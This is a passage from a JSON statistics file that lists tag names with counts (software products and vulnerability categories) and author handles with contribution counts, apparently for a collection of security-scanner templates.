{"name":"asp","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"git","count":4},{"name":"exchange","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"zabbix","count":4},{"name":"symfony","count":4},{"name":"amazon","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"hongdian","count":4},{"name":"firebase","count":4},{"name":"strapi","count":4},{"name":"resin","count":4},{"name":"buffalo","count":4},{"name":"vpn","count":4},{"name":"proxy","count":4},{"name":"grafana","count":4},{"name":"fatpipe","count":4},{"name":"npm","count":4},{"name":"magmi","count":4},{"name":"wso2","count":4},{"name":"slack","count":4},{"name":"samsung","count":4},{"name":"rfi","count":4},{"name":"elastic","count":4},{"name":"vbulletin","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"targa","count":3},{"name":"ssh","count":3},{"name":"fpd","count":3},{"name":"nexus","count":3},{"name":"kafka","count":3},{"name":"druid","count":3},{"name":"r-seenet","count":3},{"name":"cve2007","count":3},{"name":"fanruan","count":3},{"name":"backdoor","count":3},{"name":"telerik","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"zhiyuan","count":3},{"name":"mail","count":3},{"name":"azure","count":3},{"name":"search","count":3},{"name":"injection","count":3},{"name":"exposures","count":3},{"name":"bigip","count":3},{"name":"prometheus","count":3},{"name":"ofbiz","count":3},{"name":"jeesns","count":3},{"name":"httpd","count":3},{"name":"terramaster","count":3},{"name":"ebs","count":3},{"name":"caucho","count":3},{"name":"github","count":3},{"name":"cloud","count":3},{"name":"mongodb","count":3},{"name":"kibana","count":3},{"name":"nacos","count":3},{"name":"nosqli","count":3},{"name":"node","count":3},{"name":"hoteldruid","count":3},{"name":"itop","count":3},{"name":"jellyfin","count":3},{"name":"log","count":3},{"name":"linkerd","count":3},{"name":"opensis","count":3},{"name":"openssh","count":3},{"name":"kevinlab","count":3},{"name":"openam","count":3},{"name":"oa","count":3},{"name":"cves","count":3},{"name":"smtp","count":3},{"name":"tikiwiki","count":3},{"name":"lansweeper","count":3},{"name":"cacti","count":3},{"name":"paloalto","count":2},{"name":"ec2","count":2},{"name":"mailchimp","count":2},{"name":"huawei","count":2},{"name":"cve2005","count":2},{"name":"enumeration","count":2},{"name":"dos","count":2},{"name":"openfire","count":2},{"name":"nextcloud","count":2},{"name":"grav","count":2},{"name":"igs","count":2},{"name":"nextjs","count":2},{"name":"bucket","count":2},{"name":"couchdb","count":2},{"name":"maian","count":2},{"name":"qihang","count":2},{"name":"smb","count":2},{"name":"horde","count":2},{"name":"shellshock","count":2},{"name":"waf","count":2},{"name":"s3","count":2},{"name":"status","count":2},{"name":"geowebserver","count":2},{"name":"aviatrix","count":2},{"name":"hostheader-injection","count":2},{"name":"backups","count":2},{"name":"spark","count":2},{"name":"commax","count":2},{"name":"activemq","count":2},{"name":"linux","count":2},{"name":"liferay","count":2},{"name":"jsf","count":2},{"name":"jboss","count":2},{"name":"yapi","count":2},{"name":"ecoa","count":2},{"name":"lotus","count":2},{"name":"akkadian","count":2},{"name":"text","count":2},{"name":"seeyon","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"db","count":2},{"name":"justwriting","count":2},{"name":"adminer","count":2},{"name":"kentico","count":2},{"name":"bruteforce","count":2},{"name":"rockmongo","count":2},{"name":"ucmdb","count":2},{"name":"plesk","count":2},{"name":"places","count":2},{"name":"sonicwall","count":2},{"name":"sitecore","count":2},{"name":"wordfence","count":2},{"name":"prtg","count":2},{"name":"netis","count":2},{"name":"globalprotect","count":2},{"name":"dolibarr","count":2},{"name":"prestashop","count":2},{"name":"upload","count":2},{"name":"mida","count":2},{"name":"chiyu","count":2},{"name":"frp","count":2},{"name":"payara","count":2},{"name":"keycloak","count":2},{"name":"harbor","count":2},{"name":"fortios","count":2},{"name":"icewarp","count":2},{"name":"emerge","count":2},{"name":"minio","count":2},{"name":"trixbox","count":2},{"name":"ilo","count":2},{"name":"vcenter","count":2},{"name":"heroku","count":2},{"name":"guacamole","count":2},{"name":"kong","count":2},{"name":"hpe","count":2},{"name":"natshell","count":2},{"name":"totemomail","count":2},{"name":"aruba","count":2},{"name":"ecology","count":2},{"name":"service","count":2},{"name":"yii","count":2},{"name":"akamai","count":2},{"name":"hashicorp","count":2},{"name":"chamilo","count":2},{"name":"nagios","count":2},{"name":"xxljob","count":2},{"name":"axis","count":2},{"name":"bitly","count":2},{"name":"mcafee","count":2},{"name":"netsweeper","count":2},{"name":"axis2","count":2},{"name":"sharepoint","count":2},{"name":"splunk","count":2},{"name":"vrealize","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"rancher","count":2},{"name":"leak","count":2},{"name":"qcubed","count":2},{"name":"glassfish","count":2},{"name":"chyrp","count":2},{"name":"voipmonitor","count":2},{"name":"embed","count":2},{"name":"phpcollab","count":2},{"name":"electron","count":2},{"name":"bypass","count":2},{"name":"rstudio","count":2},{"name":"storage","count":2},{"name":"tidb","count":2},{"name":"odoo","count":2},{"name":"cache","count":2},{"name":"favicon","count":2},{"name":"sonarqube","count":2},{"name":"saltstack","count":2},{"name":"wuzhicms","count":2},{"name":"flir","count":2},{"name":"getsimple","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"showdoc","count":2},{"name":"hasura","count":2},{"name":"openvpn","count":2},{"name":"webcam","count":2},{"name":"middleware","count":2},{"name":"wmt","count":1},{"name":"route","count":1},{"name":"office365","count":1},{"name":"shoretel","count":1},{"name":"hiawatha","count":1},{"name":"blue-ocean","count":1},{"name":"openrestry","count":1},{"name":"fiori","count":1},{"name":"playable","count":1},{"name":"acme","count":1},{"name":"sangfor","count":1},{"name":"cockpit","count":1},{"name":"jitsi","count":1},{"name":"wazuh","count":1},{"name":"extractor","count":1},{"name":"node-red-dashboard","count":1},{"name":"graphql","count":1},{"name":"iceflow","count":1},{"name":"nsasg","count":1},{"name":"karel","count":1},{"name":"nedi","count":1},{"name":"mdb","count":1},{"name":"selea","count":1},{"name":"mariadb","count":1},{"name":"sidekiq","count":1},{"name":"redis","count":1},{"name":"messaging","count":1},{"name":"openemr","count":1},{"name":"cve202","count":1},{"name":"episerver","count":1},{"name":"aura","count":1},{"name":"netmask","count":1},{"name":"mongo","count":1},{"name":"adb","count":1},{"name":"starttls","count":1},{"name":"huijietong","count":1},{"name":"gilacms","count":1},{"name":"resourcespace","count":1},{"name":"razor","count":1},{"name":"adiscon","count":1},{"name":"wifisky","count":1},{"name":"feifeicms","count":1},{"name":"spotify","count":1},{"name":"yealink","count":1},{"name":"rdp","count":1},{"name":"jfrog","count":1},{"name":"oscommerce","count":1},{"name":"interlib","count":1},{"name":"landrayoa","count":1},{"name":"testrail","count":1},{"name":"ecom","count":1},{"name":"discord","count":1},{"name":"traefik","count":1},{"name":"circontrorl","count":1},{"name":"dompdf","count":1},{"name":"manager","count":1},{"name":"tamronos","count":1},{"name":"opentsdb","count":1},{"name":"meraki","count":1},{"name":"stripe","count":1},{"name":"plc","count":1},{"name":"trane","count":1},{"name":"weglot","count":1},{"name":"blackboard","count":1},{"name":"tieline","count":1},{"name":"centos","count":1},{"name":"tongda","count":1},{"name":"comodo","count":1},{"name":"gsoap","count":1},{"name":"ems","count":1},{"name":"mara","count":1},{"name":"avalanche","count":1},{"name":"redmine","count":1},{"name":"concrete","count":1},{"name":"expose","count":1},{"name":"darkstat","count":1},{"name":"elascticsearch","count":1},{"name":"linkedin","count":1},{"name":"panos","count":1},{"name":"iptime","count":1},{"name":"hubspot","count":1},{"name":"deviantart","count":1},{"name":"bing","count":1},{"name":"dotnet","count":1},{"name":"klog","count":1},{"name":"circleci","count":1},{"name":"streetview","count":1},{"name":"visualstudio","count":1},{"name":"graphite","count":1},{"name":"woocommerce","count":1},{"name":"exacqvision","count":1},{"name":"find","count":1},{"name":"tika","count":1},{"name":"jenzabar","count":1},{"name":"details","count":1},{"name":"flink","count":1},{"name":"fuelcms","count":1},{"name":"travis","count":1},{"name":"bedita","count":1},{"name":"spf","count":1},{"name":"solarlog","count":1},{"name":"cve2006","count":1},{"name":"stem","count":1},{"name":"fcm","count":1},{"name":"minimouse","count":1},{"name":"phpunit","count":1},{"name":"square","count":1},{"name":"mirai","count":1},{"name":"ilo4","count":1},{"name":"openx","count":1},{"name":"cerebro","count":1},{"name":"emby","count":1},{"name":"smi","count":1},{"name":"azkaban","count":1},{"name":"svn","count":1},{"name":"zookeeper","count":1},{"name":"zte","count":1},{"name":"proftpd","count":1},{"name":"spidercontrol","count":1},{"name":"etouch","count":1},{"name":"xampp","count":1},{"name":"mkdocs","count":1},{"name":"ricoh","count":1},{"name":"listserv","count":1},{"name":"finereport","count":1},{"name":"tensorboard","count":1},{"name":"vscode","count":1},{"name":"shiro","count":1},{"name":"email","count":1},{"name":"diris","count":1},{"name":"zeroshell","count":1},{"name":"zarafa","count":1},{"name":"package","count":1},{"name":"alerta","count":1},{"name":"aspnuke","count":1},{"name":"artica","count":1},{"name":"default","count":1},{"name":"tjws","count":1},{"name":"rockethchat","count":1},{"name":"cse","count":1},{"name":"labtech","count":1},{"name":"netgenie","count":1},{"name":"kafdrop","count":1},{"name":"totaljs","count":1},{"name":" default-login","count":1},{"name":"csrf","count":1},{"name":"codemeter","count":1},{"name":"glowroot","count":1},{"name":"wiki","count":1},{"name":"qdpm","count":1},{"name":"commscope","count":1},{"name":"jnoj","count":1},{"name":"scs","count":1},{"name":"auth","count":1},{"name":"szhe","count":1},{"name":"plugin","count":1},{"name":"maccmsv10","count":1},{"name":"luftguitar","count":1},{"name":"lg-nas","count":1},{"name":"codeigniter","count":1},{"name":"triconsole","count":1},{"name":"sophos","count":1},{"name":"dotnetnuke","count":1},{"name":"sql","count":1},{"name":"mrtg","count":1},{"name":"soar","count":1},{"name":"yachtcontrol","count":1},{"name":"wondercms","count":1},{"name":"cves2001","count":1},{"name":"geolocation","count":1},{"name":"emc","count":1},{"name":"dom","count":1},{"name":"erp-nc","count":1},{"name":"ambari","count":1},{"name":"krweb","count":1},{"name":"floc","count":1},{"name":"dvr","count":1},{"name":"directions","count":1},{"name":"dnssec","count":1},{"name":"keenetic","count":1},{"name":"plone","count":1},{"name":"ssltls","count":1},{"name":"weather","count":1},{"name":"hiboss","count":1},{"name":"jmx","count":1},{"name":"contentkeeper","count":1},{"name":"centreon","count":1},{"name":"ns","count":1},{"name":"panasonic","count":1},{"name":"calendarix","count":1},{"name":"crm","count":1},{"name":"optiLink","count":1},{"name":"esmtp","count":1},{"name":"zenario","count":1},{"name":"owasp","count":1},{"name":"geocode","count":1},{"name":"k8s","count":1},{"name":"moin","count":1},{"name":"graylog","count":1},{"name":"opm","count":1},{"name":"exponentcms","count":1},{"name":"domxss","count":1},{"name":"metinfo","count":1},{"name":"ulterius","count":1},{"name":"zcms","count":1},{"name":"pulsesecure","count":1},{"name":"panabit","count":1},{"name":"viewpoint","count":1},{"name":"cors","count":1},{"name":"rocketchat","count":1},{"name":"qvisdvr","count":1},{"name":"pagespeed","count":1},{"name":"visionhub","count":1},{"name":"timeclock","count":1},{"name":"grails","count":1},{"name":"lokalise","count":1},{"name":"roads","count":1},{"name":"timezone","count":1},{"name":"clusterengine","count":1},{"name":"phpwiki","count":1},{"name":"fortinet","count":1},{"name":"pivotaltracker","count":1},{"name":"metabase","count":1},{"name":"idemia","count":1},{"name":"place","count":1},{"name":"acontent","count":1},{"name":"twitter","count":1},{"name":"miscrsoft","count":1},{"name":"nuuo","count":1},{"name":"monitorr","count":1},{"name":"bingmaps","count":1},{"name":"smartblog","count":1},{"name":"javascript","count":1},{"name":"zm","count":1},{"name":"blind","count":1},{"name":"tcexam","count":1},{"name":"sureline","count":1},{"name":"gotmls","count":1},{"name":"buildkite","count":1},{"name":"limit","count":1},{"name":"distance","count":1},{"name":"doh","count":1},{"name":"netrc","count":1},{"name":"trilithic","count":1},{"name":"landray","count":1},{"name":"lotuscms","count":1},{"name":"hortonworks","count":1},{"name":"wooyun","count":1},{"name":"gateone","count":1},{"name":"shopxo","count":1},{"name":"seacms","count":1},{"name":"dbeaver","count":1},{"name":"pyramid","count":1},{"name":"sendgrid","count":1},{"name":"dvwa","count":1},{"name":"websvn","count":1},{"name":"iterable","count":1},{"name":"jaspersoft","count":1},{"name":"fortigate","count":1},{"name":"circontrol","count":1},{"name":"javamelody","count":1},{"name":"sourcebans","count":1},{"name":"arl","count":1},{"name":"beanstalk","count":1},{"name":"sage","count":1},{"name":"solman","count":1},{"name":"netdata","count":1},{"name":"shopware","count":1},{"name":"flexbe","count":1},{"name":"syslog","count":1},{"name":"cscart","count":1},{"name":"cofax","count":1},{"name":"bazarr","count":1},{"name":"redhat","count":1},{"name":"froxlor","count":1},{"name":"gurock","count":1},{"name":"apiman","count":1},{"name":"apos","count":1},{"name":"gridx","count":1},{"name":"thinkadmin","count":1},{"name":"okta","count":1},{"name":"moinmoin","count":1},{"name":"dotclear","count":1},{"name":"lighttpd","count":1},{"name":"elevation","count":1},{"name":"cloudinary","count":1},{"name":"yzmcms","count":1},{"name":"gitlist","count":1},{"name":"couchbase","count":1},{"name":"hadoop","count":1},{"name":"autocomplete","count":1},{"name":"ruckus","count":1},{"name":"jumpcloud","count":1},{"name":"tapestry","count":1},{"name":"rsyncd","count":1},{"name":"tinypng","count":1},{"name":"dropbox","count":1},{"name":"api-manager","count":1},{"name":"gitea","count":1},{"name":"terraform","count":1},{"name":"gstorage","count":1},{"name":"rabbitmq","count":1},{"name":"servicenow","count":1},{"name":"loganalyzer","count":1},{"name":"jquery","count":1},{"name":"influxdb","count":1},{"name":"swagger","count":1},{"name":"ssl","count":1},{"name":"webmin","count":1},{"name":"clockwatch","count":1},{"name":"drone","count":1},{"name":"clickhouse","count":1},{"name":"mautic","count":1},{"name":"memcached","count":1},{"name":"gunicorn","count":1},{"name":"sco","count":1},{"name":"beanshell","count":1},{"name":"fastapi","count":1},{"name":"phpshowtime","count":1},{"name":"alibaba","count":1},{"name":"bolt","count":1},{"name":"newrelic","count":1},{"name":"vsftpd","count":1},{"name":"asana","count":1},{"name":"instagram","count":1},{"name":"secmail","count":1},{"name":"lancom","count":1},{"name":"speed","count":1},{"name":"pacsone","count":1},{"name":"bigbluebutton","count":1},{"name":"raspap","count":1},{"name":"webftp","count":1},{"name":"myvuehelp","count":1},{"name":"svnserve","count":1},{"name":"sgp","count":1},{"name":"mysql","count":1},{"name":"magicflow","count":1},{"name":"rhymix","count":1},{"name":"csrfguard","count":1},{"name":"pihole","count":1},{"name":"embedthis","count":1},{"name":"springframework","count":1},{"name":"k8","count":1},{"name":"postmark","count":1},{"name":"glances","count":1},{"name":"announcekit","count":1},{"name":"anchorcms","count":1},{"name":"zmanda","count":1},{"name":"upnp","count":1},{"name":"csod","count":1},{"name":"mailgun","count":1},{"name":"myucms","count":1},{"name":"powercreator","count":1},{"name":"fortigates","count":1},{"name":"webui","count":1},{"name":"accela","count":1},{"name":"lutron","count":1},{"name":"appweb","count":1},{"name":"expn","count":1},{"name":"nuxeo","count":1},{"name":"oidc","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"fortiweb","count":1},{"name":"nomad","count":1},{"name":"photo","count":1},{"name":"locations","count":1},{"name":"pmb","count":1},{"name":"smartsense","count":1},{"name":"empirecms","count":1},{"name":"opensns","count":1},{"name":"pcoip","count":1},{"name":"achecker","count":1},{"name":"tracer","count":1},{"name":"actuator","count":1},{"name":"phpinfo","count":1},{"name":"ipstack","count":1},{"name":"sarg","count":1},{"name":"okiko","count":1},{"name":"tileserver","count":1},{"name":"nerdgraph","count":1},{"name":"eyelock","count":1},{"name":"sprintful","count":1},{"name":"xunchi","count":1},{"name":"turbocrm","count":1},{"name":"lanproxy","count":1},{"name":"qsan","count":1},{"name":"etherpad","count":1},{"name":"openerp","count":1},{"name":"opencast","count":1},{"name":"ueditor","count":1},{"name":"basic-auth","count":1},{"name":"discourse","count":1},{"name":"cobub","count":1},{"name":"twitter-server","count":1},{"name":"bash","count":1},{"name":"wamp","count":1},{"name":"maxsite","count":1},{"name":"pendo","count":1},{"name":"xiuno","count":1},{"name":"xdcms","count":1},{"name":"mpsec","count":1},{"name":"chinaunicom","count":1},{"name":"shopizer","count":1},{"name":"ognl","count":1},{"name":"uwsgi","count":1},{"name":"pagerduty","count":1},{"name":"owa","count":1},{"name":"chevereto","count":1},{"name":"nc2","count":1},{"name":"clink-office","count":1},{"name":"tectuus","count":1},{"name":"database","count":1},{"name":"bookstack","count":1},{"name":"mantisbt","count":1},{"name":"mapbox","count":1},{"name":"webmodule-ee","count":1},{"name":"spring","count":1},{"name":"scimono","count":1},{"name":"viewlinc","count":1},{"name":"simplecrm","count":1},{"name":"imap","count":1},{"name":"sar2html","count":1},{"name":"cgi","count":1},{"name":"alertmanager","count":1},{"name":"ewebs","count":1},{"name":"daybyday","count":1},{"name":"cocoon","count":1},{"name":"nexusdb","count":1},{"name":"postgres","count":1},{"name":"ruby","count":1},{"name":"olivetti","count":1},{"name":"oneblog","count":1},{"name":"novnc","count":1},{"name":"werkzeug","count":1},{"name":"kerbynet","count":1},{"name":"rubedo","count":1},{"name":"spectracom","count":1},{"name":"axiom","count":1},{"name":"phpfusion","count":1},{"name":"calendly","count":1},{"name":"tor","count":1},{"name":"geutebruck","count":1},{"name":"tugboat","count":1},{"name":"wavlink","count":1},{"name":"realteo","count":1},{"name":"phalcon","count":1},{"name":"bullwark","count":1},{"name":"b2evolution","count":1},{"name":"remkon","count":1},{"name":"perl","count":1},{"name":"livezilla","count":1},{"name":"kindeditor","count":1},{"name":"faraday","count":1},{"name":"nweb2fax","count":1},{"name":"octoprint","count":1},{"name":"avtech","count":1},{"name":"robomongo","count":1},{"name":"redcap","count":1},{"name":"craftcms","count":1},{"name":"74cms","count":1},{"name":"checkpoint","count":1},{"name":"wing-ftp","count":1},{"name":"zzzcms","count":1},{"name":"jsp","count":1},{"name":"cloudron","count":1},{"name":"tpshop","count":1},{"name":"xmlchart","count":1},{"name":"st","count":1},{"name":"htmli","count":1},{"name":"salesforce","count":1},{"name":"ghost","count":1},{"name":"placeos","count":1},{"name":"gloo","count":1},{"name":"visualtools","count":1},{"name":"ioncube","count":1},{"name":"setup","count":1},{"name":"saltapi","count":1},{"name":"webadmin","count":1},{"name":"synnefo","count":1},{"name":"vnc","count":1},{"name":"sentry","count":1},{"name":"gespage","count":1},{"name":"omi","count":1},{"name":"argussurveillance","count":1},{"name":"skywalking","count":1},{"name":"mobileiron","count":1},{"name":"shoppable","count":1},{"name":"clave","count":1},{"name":"wildfly","count":1},{"name":"zms","count":1},{"name":"woocomernce","count":1},{"name":"logontracer","count":1},{"name":"ntopng","count":1},{"name":"elasticsearch","count":1},{"name":"parentlink","count":1},{"name":"kyan","count":1},{"name":"mantis","count":1},{"name":"mongoshake","count":1},{"name":"ganglia","count":1},{"name":"buttercms","count":1},{"name":"sceditor","count":1},{"name":"rmi","count":1},{"name":"zyxel","count":1},{"name":"nette","count":1},{"name":"fortilogger","count":1},{"name":"eg","count":1},{"name":"matrix","count":1},{"name":"jeewms","count":1},{"name":"plastic","count":1},{"name":"cherokee","count":1},{"name":"motorola","count":1},{"name":"javafaces","count":1},{"name":"nimble","count":1},{"name":"nps","count":1},{"name":"processmaker","count":1},{"name":"gogs","count":1},{"name":"sqlite","count":1},{"name":"jenkin","count":1},{"name":"wakatime","count":1},{"name":"key","count":1},{"name":"redwood","count":1},{"name":"kubeflow","count":1},{"name":"duomicms","count":1},{"name":"majordomo2","count":1},{"name":"geddy","count":1},{"name":"spip","count":1},{"name":"socomec","count":1},{"name":"varnish","count":1},{"name":"nordex","count":1},{"name":"zend","count":1},{"name":"weiphp","count":1},{"name":"asus","count":1},{"name":"camunda","count":1},{"name":"pippoint","count":1},{"name":"frontpage","count":1},{"name":"loqate","count":1},{"name":"nifi","count":1},{"name":"pgadmin","count":1},{"name":"nearby","count":1},{"name":"biometrics","count":1},{"name":"openweather","count":1},{"name":"fastcgi","count":1},{"name":"phpfastcache","count":1},{"name":"subrion","count":1},{"name":"haproxy","count":1},{"name":"graph","count":1},{"name":"octobercms","count":1},{"name":"tenda","count":1},{"name":"whm","count":1},{"name":"sonarcloud","count":1},{"name":"tensorflow","count":1},{"name":"timesheet","count":1},{"name":"burp","count":1},{"name":"openstack","count":1},{"name":"portainer","count":1},{"name":"vidyo","count":1},{"name":"mod-proxy","count":1},{"name":"xvr","count":1},{"name":"acexy","count":1},{"name":"youtube","count":1},{"name":"expressjs","count":1},{"name":"goahead","count":1},{"name":"primetek","count":1},{"name":"vsphere","count":1},{"name":"servicedesk","count":1},{"name":"digitalocean","count":1},{"name":"eprints","count":1},{"name":"mediumish","count":1},{"name":"natemail","count":1},{"name":"rujjie","count":1},{"name":"addpac","count":1},{"name":"websphere","count":1},{"name":"linksys","count":1},{"name":"monitorix","count":1},{"name":"wavemaker","count":1},{"name":"h3c-imc","count":1},{"name":"eyou","count":1},{"name":"cloudflare","count":1},{"name":"opensmtpd","count":1},{"name":"postmessage","count":1},{"name":"circle","count":1},{"name":"clockwork","count":1},{"name":"elfinder","count":1},{"name":"xml","count":1},{"name":"rmc","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":280},{"name":"dhiyaneshdk","count":273},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":50},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"meme-lord","count":7},{"name":"dogasantos","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"logicalhunter","count":6},{"name":"rootxharsh","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"lu4nx","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"johnk3r","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"f1tz","count":3},{"name":"vsh00t","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"0w4ys","count":3},{"name":"skeltavik","count":3},{"name":"shine","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"jarijaas","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"unstabl3","count":3},{"name":"me9187","count":3},{"name":"johnjhacking","count":3},{"name":"sushantkamble","count":3},{"name":"mavericknerd","count":3},{"name":"idealphase","count":3},{"name":"0xrudra","count":2},{"name":"dheerajmadhukar","count":2},{"name":"vavkamil","count":2},{"name":"bp0lr","count":2},{"name":"bsysop","count":2},{"name":"0xelkomy","count":2},{"name":"moritz nentwig","count":2},{"name":"g4l1t0","count":2},{"name":"convisoappsec","count":2},{"name":"nkxxkn","count":2},{"name":"parth","count":2},{"name":"huowuzhao","count":2},{"name":"whoever","count":2},{"name":"w4cky_","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"socketz","count":2},{"name":"swissky","count":2},{"name":"0xsmiley","count":2},{"name":"cocxanh","count":2},{"name":"joeldeleep","count":2},{"name":"sy3omda","count":2},{"name":"0xcrypto","count":2},{"name":"mohammedsaneem","count":2},{"name":"manas_harsh","count":2},{"name":"afaq","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"bernardofsr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"r3naissance","count":2},{"name":"zomsop82","count":2},{"name":"hetroublemakr","count":2},{"name":"gevakun","count":2},{"name":"foulenzer","count":2},{"name":"random-robbie","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"gal nagli","count":2},{"name":"hahwul","count":2},{"name":"alifathi-h1","count":2},{"name":"ehsahil","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"r12w4n","count":2},{"name":"arcc","count":2},{"name":"udit_thakkur","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"0xprial","count":2},{"name":"pxmme1337","count":2},{"name":"randomrobbie","count":2},{"name":"deena","count":1},{"name":"qlkwej","count":1},{"name":"_harleo","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"x6263","count":1},{"name":"thebinitghimire","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"makyotox","count":1},{"name":"b4uh0lz","count":1},{"name":"schniggie","count":1},{"name":"andysvints","count":1},{"name":"@ofjaaah","count":1},{"name":"b0rn2r00t","count":1},{"name":"daviey","count":1},{"name":"kurohost","count":1},{"name":"intx0x80","count":1},{"name":"sec_hawk","count":1},{"name":"forgedhallpass","count":1},{"name":"shreyapohekar","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"berkdusunur","count":1},{"name":"affix","count":1},{"name":"ilovebinbash","count":1},{"name":"fopina","count":1},{"name":"notsoevilweasel","count":1},{"name":"elmahdi","count":1},{"name":"rodnt","count":1},{"name":"oscarintherocks","count":1},{"name":"push4d","count":1},{"name":"thezakman","count":1},{"name":"droberson","count":1},{"name":"s1r1u5_","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"juicypotato1","count":1},{"name":"hanlaomo","count":1},{"name":"mhdsamx","count":1},{"name":"akash.c","count":1},{"name":"d0rkerdevil","count":1},{"name":"apt-mirror","count":1},{"name":"revblock","count":1},{"name":"0xrod","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ipanda","count":1},{"name":"ooooooo_q","count":1},{"name":"omarkurt","count":1},{"name":"wabafet","count":1},{"name":"alperenkesk","count":1},{"name":"adrianmf","count":1},{"name":"naglinagli","count":1},{"name":"chron0x","count":1},{"name":"jeya seelan","count":1},{"name":"ringo","count":1},{"name":"undefl0w","count":1},{"name":"yavolo","count":1},{"name":"pudsec","count":1},{"name":"pratik khalane","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"elder tao","count":1},{"name":"elouhi","count":1},{"name":"kabirsuda","count":1},{"name":"furkansenan","count":1},{"name":"ldionmarcil","count":1},{"name":"mubassirpatel","count":1},{"name":"ahmetpergamum","count":1},{"name":"ohlinge","count":1},{"name":"andirrahmani1","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"lark lab","count":1},{"name":"noamrathaus","count":1},{"name":"akshansh","count":1},{"name":"alph4byt3","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"absshax","count":1},{"name":"dawid-czarnecki","count":1},{"name":"its0x08","count":1},{"name":"jrolf","count":1},{"name":"smaranchand","count":1},{"name":"_darrenmartyn","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"0xd0ff9","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"kre80r","count":1},{"name":"nytr0gen","count":1},{"name":"yashgoti","count":1},{"name":"alex","count":1},{"name":"taielab","count":1},{"name":"patralos","count":1},{"name":"ahmed sherif","count":1},{"name":"mass0ma","count":1},{"name":"0xteles","count":1},{"name":"0ut0fb4nd","count":1},{"name":"philippdelteil","count":1},{"name":"hakluke","count":1},{"name":"borna nematzadeh","count":1},{"name":"xstp","count":1},{"name":"thevillagehacker","count":1},{"name":"orpheus","count":1},{"name":"bad5ect0r","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"pdp","count":1},{"name":"aresx","count":1},{"name":"exploitation","count":1},{"name":"@dwisiswant0","count":1},{"name":"infosecsanyam","count":1},{"name":"defr0ggy","count":1},{"name":"sickwell","count":1},{"name":"zandros0","count":1},{"name":"remonsec","count":1},{"name":"0xtavian","count":1},{"name":"nerrorsec","count":1},{"name":"sid ahmed malaoui @ realistic 